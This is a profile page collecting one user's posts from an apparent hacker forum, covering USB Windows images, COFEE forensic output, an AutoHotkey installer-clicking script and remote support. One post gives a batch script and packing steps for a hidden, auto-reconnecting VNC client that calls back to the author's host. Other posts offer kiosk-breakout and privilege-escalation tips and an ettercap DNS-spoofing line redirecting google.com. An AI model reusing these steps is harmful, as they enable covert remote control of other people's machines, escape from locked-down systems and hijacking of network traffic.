Posts posted by operat0r_001
-
-
I searched for usboot and did not see any post so I did this real quick ..
USBOOT.ORG ( the idea behind it: it creates an image of the current OS and tweaks it for you )
* load up a new clean VM with whatever MS OS you like ( MUST BE NTFS ! tested with windows XP )
* download driverpacks.net ( I just used LAN and WIFI )
* install usboot.org on the VMware image ( just extract to c:\ )
* place the driverpacks extracted into the c:\extra drivers folder of the usboot.org install
* read the readme file for basic idea of how it works ...
* run phase 1 ( phase-I )
* while phase 1 is running format and make the USB flash drive bootable ( I downloaded WinSetupFromUSB and formatted the USB stick FAT32. NTFS should work too but not sure )
after it's all said and done you end up with ~ 1.6gig install of windows with LAN and WIFI drivers .. you can add more drivers etc but partimage it came out to a 777meg image ! you can DUMP that image to a HDD and boot all in under like 4min ... beats Nlite by 50min :)
* sometimes I get bluescreen but reboot it works ok
* sometimes I have to reboot for it to boot off the usb stick or plug it into the back
-
Wow .. really ? don't even bother .. it's like hacksaw but somehow worse .. only good thing about it: prob not picked up by malware scanners ... ..
This "Computer Online Forensic Evidence Extractor (COFEE)" is no more than just old windows exe all compiled into a dump log with some www.sysinternals.com utils added on ... w0w really .. ? this is a joke right ?!?
--operat0r AKA rmccurdy.com
//-----------------------------------------------
// Check Requied Files
//-----------------------------------------------
Finding uptime.exe ... found
Finding config.txt ... found
Finding folders.txt ... found
Finding pausep.exe ... found
Finding NW3C_SHA1.exe ... found
//-----------------------------------------------
// Load Config
//-----------------------------------------------
//-----------------------------------------------
// Read Disk Label
//-----------------------------------------------
//-----------------------------------------------
// Find COFEE Drives
//-----------------------------------------------
//-----------------------------------------------
// Detect OS
//-----------------------------------------------
The OS of this system is Windows XP
//-----------------------------------------------
// Create Output Folders
//-----------------------------------------------
F:\out-PANSY-8349E3157-20091110214413 is created
F:\out-PANSY-8349E3157-20091110214413\network is created
F:\out-PANSY-8349E3157-20091110214413\process is created
F:\out-PANSY-8349E3157-20091110214413\services is created
F:\out-PANSY-8349E3157-20091110214413\users is created
F:\out-PANSY-8349E3157-20091110214413\password is created
F:\out-PANSY-8349E3157-20091110214413\policy is created
F:\out-PANSY-8349E3157-20091110214413\registry is created
F:\out-PANSY-8349E3157-20091110214413\log is created
F:\out-PANSY-8349E3157-20091110214413\file is created
F:\out-PANSY-8349E3157-20091110214413\memory is created
F:\out-PANSY-8349E3157-20091110214413\opt_tool is created
F:\out-PANSY-8349E3157-20091110214413\misc is created
//-----------------------------------------------
// Run Command
//-----------------------------------------------
Start COFEE
Verifying ... Success Start... Commandline : at.exe [Press Space to KILL the Process] Calculating Hash ... Done End
Verifying ... Success Start... Commandline : autorunsc.exe [Press Space to KILL the Process] Calculating Hash ... Done End
Verifying ... Success Start... Commandline : arp.exe -a [Press Space to KILL the Process] Calculating Hash ... Done End
Verifying ... Success Start... Commandline : getmac.exe [Press Space to KILL the Process] Calculating Hash ... Done End
Verifying ... Success Start... Commandline : hostname.exe [Press Space to KILL the Process] Calculating Hash ... Done End
Verifying ... Success Start... Commandline : ipconfig.exe /all [Press Space to KILL the Process] Calculating Hash ... Done End
Verifying ... Success Start... Commandline : msinfo32.exe /report F:\out-PANSY-8349E3157-20091110214413\misc\1b7c1a3b3ded3e610cdb046ddbdf2c22.txt [Press Space to KILL the Process]
************************************
Pause... Select Process to kill :
0 ... Resume
1 ... msinfo32.exe
************************************
************************************
Killing msinfo32.exe /report F:\out-PANSY-8349E3157-20091110214413\misc\1b7c1a3b3ded3e610cdb046ddbdf2c22.txt
************************************
Calculating Hash ... Done End
Verifying ... Success Start... Commandline : nbtstat.exe -A 127.0.0.1 [Press Space to KILL the Process] Calculating Hash ... Done End
Verifying ... Success Start... Commandline : nbtstat.exe -S [Press Space to KILL the Process] Calculating Hash ... Done End
Verifying ... Success Start... Commandline : nbtstat.exe -c [Press Space to KILL the Process] Calculating Hash ... Done End
Verifying ... Success Start... Commandline : nbtstat.exe -n [Press Space to KILL the Process] Calculating Hash ... Done End
Verifying ... Success Start... Commandline : net.exe user [Press Space to KILL the Process] Calculating Hash ... Done End
Verifying ... Success Start... Commandline : net.exe file [Press Space to KILL the Process] Calculating Hash ... Done End
Verifying ... Success Start... Commandline : net.exe accounts [Press Space to KILL the Process] Calculating Hash ... Done End
Verifying ... Success Start... Commandline : net.exe view [Press Space to KILL the Process] Calculating Hash ... Done End
Verifying ... Success Start... Commandline : net.exe start [Press Space to KILL the Process] Calculating Hash ... Done End
Verifying ... Success Start... Commandline : net.exe session [Press Space to KILL the Process] Calculating Hash ... Done End
Verifying ... Success Start... Commandline : net.exe localgroup administrators /domain [Press Space to KILL the Process] Calculating Hash ... Done End
Verifying ... Success Start... Commandline : net.exe localgroup [Press Space to KILL the Process] Calculating Hash ... Done End
Verifying ... Success Start... Commandline : net.exe share [Press Space to KILL the Process] Calculating Hash ... Done End
Verifying ... Success Start... Commandline : net.exe use [Press Space to KILL the Process] Calculating Hash ... Done End
Verifying ... Success Start... Commandline : net.exe localgroup administrators [Press Space to KILL the Process] Calculating Hash ... Done End
Verifying ... Success Start... Commandline : net.exe group [Press Space to KILL the Process] Calculating Hash ... Done End
Verifying ... Success Start... Commandline : netdom.exe query DC [Press Space to KILL the Process] Calculating Hash ... Done End
Verifying ... Success Start... Commandline : openfiles.exe /query /v [Press Space to KILL the Process] Calculating Hash ... Done End
Verifying ... Success Start... Commandline : psfile.exe [Press Space to KILL the Process] Calculating Hash ... Done End
Verifying ... Success Start... Commandline : pslist.exe -t [Press Space to KILL the Process] Calculating Hash ... Done End
Verifying ... Success Start... Commandline : pslist.exe [Press Space to KILL the Process] Calculating Hash ... Done End
Verifying ... Success Start... Commandline : psloggedon.exe [Press Space to KILL the Process] Calculating Hash ... Done End
Verifying ... Success Start... Commandline : psservice.exe [Press Space to KILL the Process] Calculating Hash ... Done End
Verifying ... Success Start... Commandline : pstat.exe [Press Space to KILL the Process] Calculating Hash ...
-
FIXED :) backups were 3 days old and I made this just yesterday
-
my 80gig drive died last night still getting things up ..
somehow I guess I misread it as snuggie or something ..
08:57 <+Dfg> where is snubs :(
08:57 <+Dfg> Who cares!
08:58 <+Dfg> I will come my flying Camel and take you away
08:58 Dfg goes to fuel up his Camel
09:11 <operat0r> Dfg: that gave me a a great IDEA !
09:11 <operat0r> LOL
09:11 <operat0r> HOLD ON give me like 15min ..lol
09:11 <operat0r> photoshop
-
man arp
-
interesting ? you got the exe I can poke with ?? I need help with one of my projects: a fully automated mass uninstaller
idea being you run it, walk away and everything you put on the list is uninstalled :) not needing to know the options etc it would do things like not reboot and try to select the right stuff to click :P
pm me if you are any good at it ..
F12::
; Control Spy - Written by A.N.Suresh Kumar AKA Goyyah / 25-Aug-2006 / Version ??????
AutoTrim, OFF
^#!F12::
; Dump every control of the active window (hwnd, ClassNN, first 40 chars of text) into a report
FileDelete, %A_Temp%\ControlList.txt
IfWinExist,Control.Spy.Report,WinActivate,Control.Spy.Report
IfWinExist,Control.Spy.Report,Exit
Clis=
ID:=WinExist("A")
WinGet, Clist, ControlList, ahk_id %ID%
WinGetTitle, Title, ahk_id %ID%
WinGetClass, Class, ahk_id %ID%
FileAppend, %Title% [Class:%Class%]`n, %A_Temp%\ControlList.txt
FileAppend,---------------------------------------------------------------------------------------------------`n, %A_Temp%\ControlList.txt
FileAppend,Sl c_Hwnd ClassNN Control Text (40 Characters only) `n, %A_Temp%\ControlList.txt
FileAppend,---------------------------------------------------------------------------------------------------`n, %A_Temp%\ControlList.txt
Loop, Parse, CList, `n
{
    ControlGet,cHwnd, Hwnd,, %A_LoopField%, ahk_id %ID%
    ControlGetText,cText,, ahk_id %cHwnd%
    ; flatten line breaks in the control text so each control stays on one row
    StringReplace,cText,cText, `n, % Chr(32), All
    StringReplace,cText,cText, `r, % Chr(32), All
    StringLeft,cText,cText,40
    Clis = % Clis "`n" SetWidth(A_Index,3) ". " SetWidth(cHwnd,12) " " SetWidth(A_LoopField,40) " " Ctext
}
FileAppend, %Clis%`n, %A_Temp%\ControlList.txt
FileAppend,---------------------------------------------------------------------------------------------------`n, %A_Temp%\ControlList.txt
FileAppend,* Control Spy * By Goyyah, %A_Temp%\ControlList.txt
FileRead, Report, %A_Temp%\ControlList.txt
Gui,Font, s9, Courier New
Gui,Add,Edit, w740 h540 , % Report
Gui,Add,Button, x600 gGuiClose w140 , &Copy to Clipboard
Gui,Show,,Control.Spy.Report
Send, {Home}
Return

GuiEscape:
GuiClose:
Clipboard= % "[code]`n" Report "`n/[code]"
ReLoad
Return

; pad Str with spaces up to Width characters
SetWidth(Str,Width) {
    Loop {
        If (StrLen(Str)>=Width)
            Break
        Else
            Str= % Str Chr(32)
    }
    Return Str
}

F11::
SoundPlay, %A_WinDir%\Media\ding.wav
;'ControlClick, OK, Some Window Title ; Clicks the OK button
ControlClick, *ext*, BlackBerry Desktop Software 4.6 - InstallShield Wizard
; Return added so F11 does not fall through into the F10 hotkey
Return

F10::
SoundPlay, %A_WinDir%\Media\ding.wav
SetTitleMatchMode RegEx
;set main window title
WinGetActiveTitle, main1
; check for main window
;IfWinNotActive %main1%
;{
;msgbox, startclicking
;}
SoundPlay, %A_WinDir%\Media\ding.wav
SetTitleMatchMode RegEx
;ControlClick, .*move.*,.*
;ControlClick, *[N|n]ext.*,.*
;ControlClick, *[O|o][K|k].Yes,.*
ControlClick, Yes,.*
Return
-
take a look at some foo here
-
http://www.binrev.com/forums/index.php/top...e__hl__repeater
ultravnc FTW mine now supports windows vista/7 etc
http://forums.remote-exploit.org/programmi...ktop-vista.html
-
-
Portable Eclipse for Android dev / JRE (java) and / Android 1.5 SDK
http://rapidshare.com/files/280881975/eclipse.zip.001
http://rapidshare.com/files/280887930/eclipse.zip.002
Been poking with my G1
http://delicious.com/operat0r/android
links to tons of example apps
-
no such thing as wifi security :) it's all failsauce
-
-
-
we use Zimbra exchange is for noobs
make a thinstall of Camtasia Studio
-
make a new local administrator >
boot with CD or USB
press F5 on boot try to login as admin
get something to run:
press F3 search for stuff to run cmd.exe etc ..also try to run stuff with IE "ctl+o" cmd etc ... also download cmd.exe and try to run it
try ctrl+alt+del to run stuff
look for old software on the system to exploit (insert adobe and flash) maybe even local privilege escalation :)
I have a usb drive with all my *tools* on it along with BT4 etc .. like this .. http://thepiratebay.org/torrent/4841204/UBER_PORTABLE_PACK you can also thinstall games and just rename it to notepad.exe etc ..
-
* give them the drive on a silver platter and tell them enjoy !
* boot safemode with networking kill explorer and scan with panda activescan pro http://rmccurdy.com/email.html
* also tell IT they should lock down all users or you will be back in a week ... noobs ...
* I offer flat 60$ remote support :)
-
rmccurdy.com/m3u.m3u all port 80 feeds from shoutcast autoupdated monthly :)
-
hehe you need to boot with the disk in the drive :P I did not think of that .. PM me know if you fix it
-
* this script TESTED WITH VISTA/WINDOWS 7 and XP
* this script auto reconnects when it does not find a established connection with the winvnc.exe
* file transfers work great on XP not so much windows 7 random crash
* get the repeater ( or just fwd a port to yourself on your router ) ( repeater allows you to remote any desktop from any desktop .. ( *NIX and WINDOWS ) IE no remote desktop over remote desktop ..
* http://sourceforge.net/projects/ultravnc/f...ix%20Repeaters/
#/etc/uvncrepeater.ini
[general]
viewerport = 21
serverport = 3389
ownipaddress = 0.0.0.0
maxsessions = 100
#runasuser = uvncrep
runasuser = root
allowedmodes = 3
logginglevel = 3
[mode1]
allowedmode1serverport = 0
requirelistedserver = 0
srvListAllow0 = 0.0.0.0;Allow network 10.x.x.x
srvListAllow1 = 192.168.0.0;Allow network 192.168.x.x
srvListAllow1 = 0.0.0.0
[mode2]
requirelistedid = 0
idlist0 = 1111
idlist1 = 2222
idlist2 = 6667
idlist3 = 0
idlist4 = 0
idlist5 = 0
idlist6 = 0
idlist7 = 0
idlist8 = 0
idlist9 = 0
[eventinterface]
* start the repeater
* extract using 7-zip.org my exe and change the domain to yours etc ...
http://rmccurdy.com/scripts/quickvnc.exe
# vnccheck.tmp
cax /killall winvnc.exe
Timeout.exe 5
start winvnc -autoreconnect -id:%ID% -connect rmccurdy.com::3389 -run
rem auto reconnect loop
:loop
Timeout.exe 60
Tcpvcon.exe -c | egrep -ia "winvnc.exe" | egrep "EST"
if errorlevel 1 goto restartvnc
Timeout.exe 60
goto loop
:restartvnc
echo Connection lost Killing VNC Processes...
Timeout.exe 10
cax /killall winvnc.exe
Timeout.exe 10
echo Reconnecting ...
start winvnc -autoreconnect -id:%ID% -connect rmccurdy.com::3389 -run
goto loop
change the start winvnc -autoreconnect -id:%ID% -connect rmccurdy.com::3389 -run
* for vista I mean windows 7 .... you need to make sure to RE RUN it as ADMINISTRATOR and kill the old CMD.EXE or just have the user run it as admin google for why etc not going into this now .. it was a PIA ...
* pack the EXE using winrar SFX option I have it extract to %userprofile%\vnc2 and overwrite/hidden etc ... ( the way it runs you can run it more than once so beware of multi vncchecks running with multi ID's from the same client..
* you can also do this with some 7-zip fu ...
* now you are ready to connect to the repeater and control the host that ran your packed EXE
* run vncviewer.exe client and set it up like this ( for extra security you can add crypto )
* be sure to add the :: not just : the older client saves only one :
* you may also need to restart repeater and kill -9 it sometimes ... ...
* change the ports on the server you will need escalated for under port 1024 in windows/*nix
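
An added check, not part of the original post or of UltraVNC: a small Python audit of the repeater settings posted above, run against the posted values and a tighter variant. It assumes the usual meaning of the keys (allowedmodes as a bitmask of mode 1 and mode 2; 0 in requirelistedserver / requirelistedid meaning "accept any"); the finding names and the hardened port numbers are constructed for illustration.

```python
import configparser

# Settings as posted above (trimmed). Note the duplicated key and the ";comment" glued to a value.
POSTED_INI = """
[general]
viewerport = 21
serverport = 3389
runasuser = root
allowedmodes = 3
[mode1]
requirelistedserver = 0
srvListAllow1 = 192.168.0.0;Allow network 192.168.x.x
srvListAllow1 = 0.0.0.0
[mode2]
requirelistedid = 0
"""

# Constructed tighter variant: unprivileged user and ports, mode 2 only, listed IDs only.
HARDENED_INI = """
[general]
viewerport = 5901
serverport = 5500
runasuser = uvncrep
allowedmodes = 2
[mode2]
requirelistedid = 1
idlist0 = 1111
"""

def value(cp, section, key, default="0"):
    # Cut a trailing ";comment" that follows the value without whitespace.
    return cp.get(section, key, fallback=default).split(";", 1)[0].strip()

def audit(text):
    # strict=False accepts the duplicate key instead of raising DuplicateOptionError.
    cp = configparser.ConfigParser(strict=False, comment_prefixes=("#", ";"))
    cp.read_string(text)
    findings = set()
    modes = int(value(cp, "general", "allowedmodes"))  # assumed bitmask: 1=mode1, 2=mode2
    if value(cp, "general", "runasuser", "") == "root":
        findings.add("RUNS_AS_ROOT")
    for key in ("viewerport", "serverport"):
        if 0 < int(value(cp, "general", key)) < 1024:
            findings.add("PRIVILEGED_PORT:" + key)
    if modes & 1 and value(cp, "mode1", "requirelistedserver") == "0":
        findings.add("MODE1_ANY_SERVER")
    if modes & 2 and value(cp, "mode2", "requirelistedid") == "0":
        findings.add("MODE2_ANY_ID")
    return sorted(findings)
```

Each finding maps to one line of the posted file: the repeater keeps root, listens on a port below 1024, relays mode 1 connections to any server address, and accepts any mode 2 ID.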
-
panda active scan pro FTW rmccurdy.com/email.html
-
all you had to say is cpanel.... http://rmccurdy.com/scripts/cpanel_scripts/ see the hackcheck lol my cpanel script circa 2007 the webhost I worked for was about 40% owned I enjoyed watching people and detecting them
colocate
get me root
I'll setup snort mod_sec and audit the site for ya ;)
-
you can use what ever you want if you use crypto .. hell dns tunnel it if you have to :)
-
yeah I hate to say it, but VNC is a pain because you have to configure port forwarding on routers and if the person is not technically minded and you're a distance away then you have problems, teamviewer bypasses all these problems...
NO ...
and NO ...
vncrepeater owns them all ... 300K client download ( mine has extra stuff like vista support etc ... )
-
lol ... torrent noobs..
RickRoll done easy
* ettercap
* echo www.google.com A 75.131.195.228 > etter.dns
easy rickroll
OR WHAT EVER RMCCURDY.COM IP IS AT THE TIME ..
http://75.131.195.228